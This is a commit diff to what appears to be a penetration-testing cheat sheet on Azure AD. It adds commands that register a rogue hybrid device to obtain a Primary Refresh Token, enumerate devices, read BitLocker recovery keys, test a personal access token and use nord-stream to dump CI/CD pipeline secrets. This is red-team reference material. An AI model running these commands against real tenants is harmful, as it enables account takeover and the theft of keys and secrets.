Azure Devops + Devices + Bitlocker
parent
4947154dc7
commit
e1341751c3
|
@ -129,6 +129,23 @@ roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --kee
|
|||
```
|
||||
|
||||
|
||||
### Request a PRT with Hybrid Device
|
||||
|
||||
Requirements:
|
||||
* ADDS user credentials
|
||||
* hybrid environment (ADDS and Azure AD)
|
||||
|
||||
Use the user account to create a computer and request a PRT
|
||||
* Create a computer account in AD: `impacket-addcomputer <domain>/<username>:<password> -dc-ip <dc-ip>`
|
||||
* Configure the computer certificate in AD with [dirkjanm/roadtools_hybrid](https://github.com/dirkjanm/roadtools_hybrid): `python setcert.py 10.10.10.10 -t '<machine-account$>' -u '<domain>\<machine-account$>' -p <machine-password>`
|
||||
* Register the hybrid device in Azure AD with this certificate: `roadtx hybriddevice -c '<machine-account>.pem' -k '<machine-account>.key' --sid '<device-sid>' -t '<aad-tenant-id>'`
|
||||
* Get a PRT with device claim
|
||||
```ps1
|
||||
roadtx prt -c <hybrid-device-name>.pem -k <hybrid-device-name>.key -u <username>@h<domain> -p <password>
|
||||
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)
|
||||
|
|
|
@ -23,6 +23,16 @@
|
|||
|
||||
## Devices
|
||||
|
||||
### List Devices
|
||||
|
||||
```ps1
|
||||
Connect-AzureAD
|
||||
Get-AzureADDevice
|
||||
$user = Get-AzureADUser -SearchString "username"
|
||||
Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true
|
||||
```
|
||||
|
||||
|
||||
### Join Devices
|
||||
|
||||
* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
|
||||
|
@ -45,11 +55,21 @@ roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --kee
|
|||
```
|
||||
|
||||
|
||||
### Bitlocker Keys
|
||||
|
||||
```ps1
|
||||
Install-Module Microsoft.Graph -Scope CurrentUser
|
||||
Import-Module Microsoft.Graph.Identity.SignIns
|
||||
Connect-MgGraph -Scopes BitLockerKey.Read.All
|
||||
Get-MgInformationProtectionBitlockerRecoveryKey -All
|
||||
Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlockerRecoveryKeyId
|
||||
```
|
||||
|
||||
|
||||
# Service Principals
|
||||
|
||||
|
||||
|
||||
# Other
|
||||
## Other
|
||||
|
||||
Lists all the client IDs you can use to get a token with the `mail.read` scope on the Microsoft Graph:
|
||||
|
||||
|
@ -57,3 +77,8 @@ Lists all the client IDs you can use to get a token with the `mail.read` scope o
|
|||
roadtx getscope -s https://graph.microsoft.com/mail.read
|
||||
roadtx findscope -s https://graph.microsoft.com/mail.read
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Pentesting Azure Mindmap](https://github.com/synacktiv/Mindmaps)
|
||||
|
|
|
@ -22,6 +22,25 @@ Runbook must be SAVED and PUBLISHED before running it.
|
|||
```
|
||||
|
||||
|
||||
## Azure Devops
|
||||
|
||||
* Verify the validity of an Azure Personal Access Token (PAT)
|
||||
```ps1
|
||||
PAT=""
|
||||
organization=""
|
||||
curl -u :${PAT} https://dev.azure.com/${organization}/_apis/build-release/builds
|
||||
```
|
||||
|
||||
* [synacktiv/nord-stream](https://github.com/synacktiv/nord-stream) - Nord Stream is a tool that allows you to extract secrets stored inside CI/CD environments by deploying malicious pipelines. It currently supports Azure DevOps, GitHub and GitLab.
|
||||
```ps1
|
||||
# List all secrets from all projects
|
||||
$ nord-stream.py devops --token "$PAT" --org myorg --list-secrets
|
||||
|
||||
# Dump all secrets from all projects
|
||||
$ nord-stream.py devops --token "$PAT" --org myorg
|
||||
```
|
||||
|
||||
|
||||
## Microsoft Intune
|
||||
|
||||
* LAPS
|
||||
|
@ -73,3 +92,4 @@ Get-MgDrive -top 1
|
|||
|
||||
* [Microsoft Graph - servicePrincipal: addPassword](https://learn.microsoft.com/en-us/graph/api/serviceprincipal-addpassword?view=graph-rest-1.0&tabs=powershell)
|
||||
* [Microsoft Intune - Microsoft Intune support for Windows LAPS](https://learn.microsoft.com/en-us/mem/intune/protect/windows-laps-overview)
|
||||
* [Pentesting Azure Mindmap - Alexis Danizan](https://github.com/synacktiv/Mindmaps)
|
Loading…
Reference in New Issue